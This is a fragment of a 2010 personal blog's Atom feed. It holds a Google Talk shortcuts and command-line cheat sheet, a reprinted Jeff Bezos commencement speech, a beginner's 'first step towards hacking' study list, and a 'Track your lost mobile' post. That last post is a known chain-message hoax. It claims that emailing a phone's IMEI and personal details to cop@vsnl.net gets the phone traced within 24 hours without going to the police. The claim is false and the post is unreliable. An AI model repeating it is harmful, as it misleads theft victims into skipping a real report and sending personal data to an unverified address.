&lt;tr&gt; &lt;td valign="top" width="130"&gt;Shift + Tab&lt;/td&gt; &lt;td valign="top" width="486"&gt;The same thing that Ctrl + Tab does.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + Shift + L&lt;/td&gt; &lt;td valign="top" width="486"&gt;Switch between points, numbers, letters, capital letters, roman   numbers and capital roman numbers&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + 1 (Key Pad)&lt;/td&gt; &lt;td valign="top" width="486"&gt;It does a simple space between the lines.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + 2 (Key Pad)&lt;/td&gt; &lt;td valign="top" width="486"&gt;It does a double space between the lines.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + 5 (Key Pad)&lt;/td&gt; &lt;td valign="top" width="486"&gt;A space does 1.5 between the lines.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + 1 (Num Pad)&lt;/td&gt; &lt;td valign="top" width="486"&gt;It goes at the end of the last line.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + 7 (Num Pad)&lt;/td&gt; &lt;td valign="top" width="486"&gt;It goes at the begin of the last line.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Ctrl + F4&lt;/td&gt; &lt;td valign="top" width="486"&gt;It closes the current window.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Alt + F4&lt;/td&gt; &lt;td valign="top" width="486"&gt;It closes the current window.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Alt + Esc&lt;/td&gt; &lt;td valign="top" width="486"&gt;It Minimize all the windows.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Windows + ESC&lt;/td&gt; &lt;td valign="top" width="486"&gt;Open Google Talk (if it’s minimized, or in the tray)&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;F9&lt;/td&gt; &lt;td valign="top" width="486"&gt;Open Gmail to send an email to the current contact.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;F11&lt;/td&gt; &lt;td valign="top" width="486"&gt;It initiates a telephonic call with your friend.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;F12&lt;/td&gt; &lt;td valign="top" width="486"&gt;It cancels a telephonic call.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;Esc&lt;/td&gt; &lt;td valign="top" width="486"&gt;It closes the current window.&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt; &lt;/table&gt;&lt;h3&gt;Google’s Secret Command-Line Parameters&lt;/h3&gt;There are a few secret parameters you can add to Google Talk and make it function differently.&lt;br /&gt;
You can use these parameters as follows:&lt;br /&gt;
“C:\program files\google\google talk\googletalk.exe” [PARAMETER]&lt;br /&gt;
&lt;table border="0px" cellpadding="3px" cellspacing="0"&gt;&lt;tbody&gt;
&lt;tr&gt; &lt;td valign="top" width="130"&gt;&lt;strong&gt;Parameter&lt;/strong&gt;&lt;/td&gt; &lt;td valign="top" width="486"&gt;&lt;strong&gt;Use&lt;/strong&gt;&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/nomutex&lt;/td&gt; &lt;td valign="top" width="420"&gt;Allows you to open more than one instance of Google Talk&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/autostart&lt;/td&gt; &lt;td valign="top" width="420"&gt;It will check the registry settings to see  if it needs to be started   or not. If the “Start automatically with  Windows” option is   unchecked, it won’t start.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/forcestart&lt;/td&gt; &lt;td valign="top" width="420"&gt;Same as /autostart, but forces it to start no matter what option was   set.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/S upgrade&lt;/td&gt; &lt;td valign="top" width="420"&gt;Used when upgrading Google Talk&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/register&lt;/td&gt; &lt;td valign="top" width="420"&gt;Registers Google Talk in the registry, includig the GMail Compose   method.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/checkupdate&lt;/td&gt; &lt;td valign="top" width="420"&gt;Check for newer versions.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/plaintextauth&lt;/td&gt; &lt;td valign="top" width="420"&gt;Uses plain authentication mechanism instead of Google’s GAIA   mechanism. Used for testing the plain method on Google’s servers.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/nogaiaauth&lt;/td&gt; &lt;td valign="top" width="420"&gt;Disables GAIA authentication method. The same as /plaintextauth .&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/factoryreset&lt;/td&gt; &lt;td valign="top" width="420"&gt;Set settings back to default.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/gaiaserver servername.com&lt;/td&gt; &lt;td valign="top" width="420"&gt;Uses a different GAIA server to connect to Google Talk. Used for   debug purposes only, there are no other known GAIA servers.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/mailto email@host.com&lt;/td&gt; &lt;td valign="top" width="420"&gt;Send an email with Gmail.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/diag&lt;/td&gt; &lt;td valign="top" width="420"&gt;Start Google Talk in diagnostic mode.&lt;/td&gt; &lt;/tr&gt;
&lt;tr&gt; &lt;td valign="top" width="196"&gt;/log&lt;/td&gt; &lt;td valign="top" width="420"&gt;Probably has something to do with the diagnostic logging&lt;/td&gt; &lt;/tr&gt;
&lt;/tbody&gt; &lt;/table&gt;&lt;h3&gt;Miscellaneous G-talk Facts&lt;/h3&gt;&lt;ul&gt;&lt;li&gt;A message can be 32767 characters long.&lt;/li&gt;
&lt;li&gt;The Gmail account ‘user@gmail.com’ can’t be invited as your friend&lt;/li&gt;
&lt;/ul&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-8875820284622332171?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/_kvyTR8vRhUiuunXkAJJ_9IVEsA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_kvyTR8vRhUiuunXkAJJ_9IVEsA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/_kvyTR8vRhUiuunXkAJJ_9IVEsA/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/_kvyTR8vRhUiuunXkAJJ_9IVEsA/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/laFFl790s7s" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/8875820284622332171/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/09/google-talk-cheat-sheet.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8875820284622332171?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/8875820284622332171?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/laFFl790s7s/google-talk-cheat-sheet.html" title="Google Talk Cheat Sheet" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/_ibkwjOee24U/TIzHqj_-FTI/AAAAAAAAAfA/k2YJFKFtNuY/s72-c/google_talk12345.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/09/google-talk-cheat-sheet.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CEYGR304cCp7ImA9Wx5XEkQ.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-2412908801275889056</id><published>2010-09-12T04:48:00.000-07:00</published><updated>2010-09-12T04:48:46.338-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-09-12T04:48:46.338-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Helpful_Info" /><title>Track your lost mobile</title><content type="html">Did you ever lost your mobile and found  no help from police or mobile operator in tracking your mobile? Well now  you don’t need to be worried about it. Now a days each one of us carry  Mobile devices and always fear that it may be stolen. Each mobile  carries a unique IMEI i.e International Mobile Identity No which can be  used to track your mobile anywhere in the world. &lt;br /&gt;
&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;This is how it works!!!!!!&lt;/div&gt;&lt;div style="text-align: justify;"&gt; 1. Dial *#06# from your mobile.&lt;br /&gt;
2. Your mobile shows a unique 15 digit .&lt;br /&gt;
3. Note down this no anywhere but except your mobile as this is the no which will help trace your mobile in case of a theft.&lt;br /&gt;
4. Once stolen you just have to mail this 15 digit IMEI no. to cop@vsnl.net&lt;br /&gt;
5. No need to go to police.&lt;br /&gt;
6. Your Mobile will be traced within next 24 hrs via a complex&lt;span style="color: #f8941d;"&gt; &lt;span style="color: black;"&gt;sytem&lt;/span&gt; &lt;/span&gt;&lt;a class="kLink" href="http://www.hungry-hackers.com/2010/07/track-your-lost-mobile.html#" id="KonaLink0" style="position: static; text-decoration: underline ! important;" target="undefined"&gt;&lt;span style="color: rgb(248, 148, 29) ! important; font-family: Arial,Helvetica; font-size: 12.35px; font-weight: 400; position: static;"&gt;&lt;span class="kLink" style="background-color: transparent; border-bottom: 1px solid rgb(248, 148, 29); color: rgb(248, 148, 29) ! important; font-family: Arial,Helvetica; font-size: 12.35px; font-weight: 400; position: relative;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="preLoadWrap" id="preLoadWrap0" style="position: relative;"&gt;&lt;div id="preLoadLayer0" style="display: none; left: -18px; position: absolute; top: -32px; z-index: 2147482647;"&gt;&lt;img class="preloadImg" src="http://kona.kontera.com/javascript/lib/imgs/grey_loader.gif" style="border: medium none; height: 22px; width: 22px;" /&gt;&lt;/div&gt;&lt;/span&gt;&lt;/a&gt; of GPRS and internet.&lt;br /&gt;
7. You will find where your hand set is being operated even in case your no is being changed.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;PASS ON THIS VERY IMP MESSAGE TO ALL YOUR FRIENDS AND RELATIVES.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;If u lost your mobile, send an e-mail to cop@vsnl.netwith the following info.&lt;br /&gt;
Your name:&lt;br /&gt;
Address:&lt;br /&gt;
Phone model:&lt;br /&gt;
Make:&lt;br /&gt;
Last used No.:&lt;br /&gt;
E-mail for communication:&lt;br /&gt;
Missed date:&lt;br /&gt;
IMEI No.:&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-2412908801275889056?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/YwcRYrYNklIhfz7XCXn4hUwzXG0/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YwcRYrYNklIhfz7XCXn4hUwzXG0/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/YwcRYrYNklIhfz7XCXn4hUwzXG0/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/YwcRYrYNklIhfz7XCXn4hUwzXG0/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/q7hrVotZ0lU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/2412908801275889056/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/09/track-your-lost-mobile.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/2412908801275889056?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/2412908801275889056?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/q7hrVotZ0lU/track-your-lost-mobile.html" title="Track your lost mobile" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/09/track-your-lost-mobile.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CUYFSHo4fCp7ImA9WxFaEE0.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-962895970386702906</id><published>2010-07-12T23:38:00.000-07:00</published><updated>2010-07-12T23:38:39.434-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-07-12T23:38:39.434-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="stories" /><title>"We are What We Choose" – Jeff Bezos on Entrepreneurship</title><content type="html">&lt;div class="wp-caption alignright" id="attachment_8143" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em; width: 198px;"&gt;&lt;img alt="Jeff_Bezos" class="size-full wp-image-8143" height="192" src="http://www.pluggd.in/wp-content/uploads/2010/07/Jeff_Bezos.jpg" title="Jeff_Bezos" width="188" /&gt;&lt;div class="wp-caption-text"&gt;Jeff_Bezos&lt;/div&gt;&lt;/div&gt;&lt;br /&gt;
&lt;!-- google_ad_section_start --&gt; &lt;br /&gt;
&lt;!-- end of entry --&gt;&lt;!-- end of entry --&gt;       As a kid, I spent my summers with my grandparents on their ranch in  Texas. I helped fix windmills, vaccinate cattle, and do other chores. We  also watched soap operas every afternoon, especially “Days of our  Lives.” My grandparents belonged to a Caravan Club, a group of Airstream  trailer owners who travel together around the U.S. and Canada. And  every few summers, we’d join the caravan. We’d hitch up the Airstream  trailer to my grandfather’s car, and off we’d go, in a line with 300  other Airstream adventurers. I loved and worshipped my grandparents and I  really looked forward to these trips. On one particular trip, I was  about 10 years old. I was rolling around in the big bench seat in the  back of the car. My grandfather was driving. And my grandmother had the  passenger seat. She smoked throughout these trips, and I hated the  smell.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
At that age, I’d take any excuse to make estimates and do minor  arithmetic. I’d calculate our gas mileage — figure out useless  statistics on things like grocery spending. I’d been hearing an ad  campaign about smoking. I can’t remember the details, but basically the  ad said, every puff of a cigarette takes some number of minutes off of  your life: I think it might have been two minutes per puff. At any rate,  I decided to do the math for my grandmother. I estimated the number of  cigarettes per days, estimated the number of puffs per cigarette and so  on. When I was satisfied that I’d come up with a reasonable number, I  poked my head into the front of the car, tapped my grandmother on the  shoulder, and proudly proclaimed, “At two minutes per puff, you’ve taken  nine years off your life!”&lt;br /&gt;
&lt;br /&gt;
I have a vivid memory of what happened, and it was not what I  expected. I expected to be applauded for my cleverness and arithmetic  skills. “Jeff, you’re so smart. You had to have made some tricky  estimates, figure out the number of minutes in a year and do some  division.” That’s not what happened. Instead, my grandmother burst into  tears. I sat in the backseat and did not know what to do. While my  grandmother sat crying, my grandfather, who had been driving in silence,  pulled over onto the shoulder of the highway. He got out of the car and  came around and opened my door and waited for me to follow. Was I in  trouble? My grandfather was a highly intelligent, quiet man. He had  never said a harsh word to me, and maybe this was to be the first time?  Or maybe he would ask that I get back in the car and apologize to my  grandmother. I had no experience in this realm with my grandparents and  no way to gauge what the consequences might be. We stopped beside the  trailer. My grandfather looked at me, and after a bit of silence, he  gently and calmly said, “Jeff, one day you’ll understand that it’s  harder to be kind than clever.”&lt;br /&gt;
&lt;br /&gt;
What I want to talk to you about today is the difference between  gifts and choices. Cleverness is a gift, kindness is a choice. Gifts are  easy — they’re given after all. Choices can be hard. You can seduce  yourself with your gifts if you’re not careful, and if you do, it’ll  probably be to the detriment of your choices.&lt;br /&gt;
This is a group with many gifts. I’m sure one of your gifts is the  gift of a smart and capable brain. I’m confident that’s the case because  admission is competitive and if there weren’t some signs that you’re  clever, the dean of admission wouldn’t have let you in.&lt;br /&gt;
&lt;br /&gt;
Your smarts will come in handy because you will travel in a land of  marvels. We humans — plodding as we are — will astonish ourselves. We’ll  invent ways to generate clean energy and a lot of it. Atom by atom,  we’ll assemble tiny machines that will enter cell walls and make  repairs. This month comes the extraordinary but also inevitable news  that we’ve synthesized life. In the coming years, we’ll not only  synthesize it, but we’ll engineer it to specifications. I believe you’ll  even see us understand the human brain. Jules Verne, Mark Twain,  Galileo, Newton — all the curious from the ages would have wanted to be  alive most of all right now. As a civilization, we will have so many  gifts, just as you as individuals have so many individual gifts as you  sit before me.&lt;br /&gt;
&lt;br /&gt;
How will you use these gifts? And will you take pride in your gifts  or pride in your choices?&lt;br /&gt;
&lt;br /&gt;
I got the idea to start Amazon 16 years ago. I came across the fact  that Web usage was growing at 2,300 percent per year. I’d never seen or  heard of anything that grew that fast, and the idea of building an  online bookstore with millions of titles — something that simply  couldn’t exist in the physical world — was very exciting to me. I had  just turned 30 years old, and I’d been married for a year. I told my  wife MacKenzie that I wanted to quit my job and go do this crazy thing  that probably wouldn’t work since most startups don’t, and I wasn’t sure  what would happen after that. MacKenzie (also a Princeton grad and  sitting here in the second row) told me I should go for it. As a young  boy, I’d been a garage inventor. I’d invented an automatic gate closer  out of cement-filled tires, a solar cooker that didn’t work very well  out of an umbrella and tinfoil, baking-pan alarms to entrap my siblings.  I’d always wanted to be an inventor, and she wanted me to follow my  passion.&lt;br /&gt;
&lt;br /&gt;
I was working at a financial firm in New York City with a bunch of  very smart people, and I had a brilliant boss that I much admired. I  went to my boss and told him I wanted to start a company selling books  on the Internet. He took me on a long walk in Central Park, listened  carefully to me, and finally said, “That sounds like a really good idea,  but it would be an even better idea for someone who didn’t already have  a good job.” That logic made some sense to me, and he convinced me to  think about it for 48 hours before making a final decision. Seen in that  light, it really was a difficult choice, but ultimately, I decided I  had to give it a shot. I didn’t think I’d regret trying and failing. And  I suspected I would always be haunted by a decision to not try at all.  After much consideration, I took the less safe path to follow my  passion, and I’m proud of that choice.&lt;br /&gt;
&lt;br /&gt;
Tomorrow, in a very real sense, your life — the life you author from  scratch on your own — begins.&lt;br /&gt;
&lt;br /&gt;
How will you use your gifts? What choices will you make?&lt;br /&gt;
&lt;br /&gt;
Will inertia be your guide, or will you follow your passions?&lt;br /&gt;
&lt;br /&gt;
Will you follow dogma, or will you be original?&lt;br /&gt;
&lt;br /&gt;
Will you choose a life of ease, or a life of service and adventure?&lt;br /&gt;
&lt;br /&gt;
Will you wilt under criticism, or will you follow your convictions?&lt;br /&gt;
&lt;br /&gt;
Will you bluff it out when you’re wrong, or will you apologize?&lt;br /&gt;
&lt;br /&gt;
Will you guard your heart against rejection, or will you act when you  fall in love?&lt;br /&gt;
&lt;br /&gt;
Will you play it safe, or will you be a little bit swashbuckling?&lt;br /&gt;
&lt;br /&gt;
When it’s tough, will you give up, or will you be relentless?&lt;br /&gt;
&lt;br /&gt;
Will you be a cynic, or will you be a builder?&lt;br /&gt;
&lt;br /&gt;
Will you be clever at the expense of others, or will you be kind?&lt;br /&gt;
&lt;br /&gt;
I will hazard a prediction. When you are 80 years old, and in a quiet  moment of reflection narrating for only yourself the most personal  version of your life story, the telling that will be most compact and  meaningful will be the series of choices you have made. In the end, we  are our choices. Build yourself a great story. Thank you and good luck!&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-962895970386702906?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/MLwN4PVP1KvmvJ6GYMAA3ET1M4w/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/MLwN4PVP1KvmvJ6GYMAA3ET1M4w/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/MLwN4PVP1KvmvJ6GYMAA3ET1M4w/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/MLwN4PVP1KvmvJ6GYMAA3ET1M4w/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/NelsonDesai/~4/wQos-2r6gso" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://nelsondesai.blogspot.com/feeds/962895970386702906/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://nelsondesai.blogspot.com/2010/07/we-are-what-we-choose-jeff-bezos-on.html#comment-form" title="0 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/962895970386702906?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/9099073570000665072/posts/default/962895970386702906?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/NelsonDesai/~3/wQos-2r6gso/we-are-what-we-choose-jeff-bezos-on.html" title="&quot;We are What We Choose&quot; – Jeff Bezos on Entrepreneurship" /><author><name>Nelson Desai</name><uri>https://profiles.google.com/113764229296536180787</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-mwPtY6WfIYE/AAAAAAAAAAI/AAAAAAAABkg/egEA8NIG5as/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://nelsondesai.blogspot.com/2010/07/we-are-what-we-choose-jeff-bezos-on.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0EFQng7fCp7ImA9WxFbFU4.&quot;"><id>tag:blogger.com,1999:blog-9099073570000665072.post-5559239417655729638</id><published>2010-07-07T12:40:00.000-07:00</published><updated>2010-07-07T12:40:13.604-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2010-07-07T12:40:13.604-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Hacking Tutorials" /><title>Your First Step Towards Hacking</title><content type="html">&lt;span style="font-size: small;"&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;Basic principle behind hacking is learn how the things are  constructed, You can easily find the way to destruct it. There are some  general mistakes in making things, you can know it only when you try to  make it too.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;When you make mistake while creating something, if someone try to  take over that mistake &amp;amp; use it as a security hole to intrude in  your system is called as hacker. So you need to learn the construction.  The construction of following things:&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Networks :&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;1. How Network is Created&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;2. How Firewalls are placed&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;3. Topology of The Network&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;4. Encryption&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Web/Internet:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;1. &lt;/b&gt;How a website is created, how they run (For that  have some website, learn some potential problems in making a website, if  you don’t have budget, then search for free hosts &amp;amp; domains )&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;2. How a blog is created &amp;amp; managed&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Applets/ Applications:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;1. Learn How the application are develop (Try to develop something,  just for practice)&lt;b&gt; &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;2. Learn specially apps of Browsers, WordPress, Twitter, Soft wares.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Platforms:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;1. You must have command over Linux&lt;b&gt; &lt;/b&gt;&amp;amp; Windows.&lt;b&gt;  &lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;2. If you have Mac, that will be great, but it is not in essential  list.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Gadgets:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Keep track of all the gadgets like – cellphones, their operating  systems, net books, PSP, gaming consoles, google android, mobile  windows, their apps everything.&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Coding &lt;/b&gt;:&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;If you can not code then you can not create. So You have to have hand on  Java, C and any of Web programming language but prefer PHP &amp;amp; HTML&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;This is too big list . . huh?&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;This is shortest ever list I have ever seen to be very loyal to you.  Really, You don’t have to do thins in one day or something. You get all  books for beginners like, networks for dummies, Java black book.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;You have to read constantly. I am trying to collect here some of the  best things which you can use it as your notes for hacking stuff. So be  updated with it. But at least know the networks &amp;amp; Linux, so You can  learn faster. Other things are your homework, you have read on net, try  to create &amp;amp; all this stuff, you need to do it on your own. I am all  here to he lo you in it. Any type of problem you have,We are here to  help. You can mail us, comment here or by any means I will try to make  things better for you.&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Just keep the patience &amp;amp;&amp;nbsp; confidence. This is your first step to  hacking – all you’re doing it for your curiosity. &lt;b&gt;And curiosity  is not a crime .&amp;nbsp; .&amp;nbsp; .&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;i&gt;If you are good at all the things listed above I would like to  Recommend some books:&lt;/i&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&amp;nbsp;1. Network Security: Private Communication in Public World (PHI  Publication) – Its about Cryptography/ Encryption&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;2. Thinking Beyond Firewalls&lt;/span&gt;&lt;br /&gt;
&lt;span style="font-size: small;"&gt;3. Linux Security Cookbook&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;&lt;i&gt;(Don’t read any book like : hacking gmail, how to&amp;nbsp; hack, hacking  secrets … blah, blah , blah- They are not for hackers)&lt;/i&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;Thank you for your feedback.&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/9099073570000665072-5559239417655729638?l=nelsondesai.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/4nfM-YcHLk5vbjMfsvQwFNU8ufA/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/4nfM-YcHLk5vbjMfsvQwFNU8ufA/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
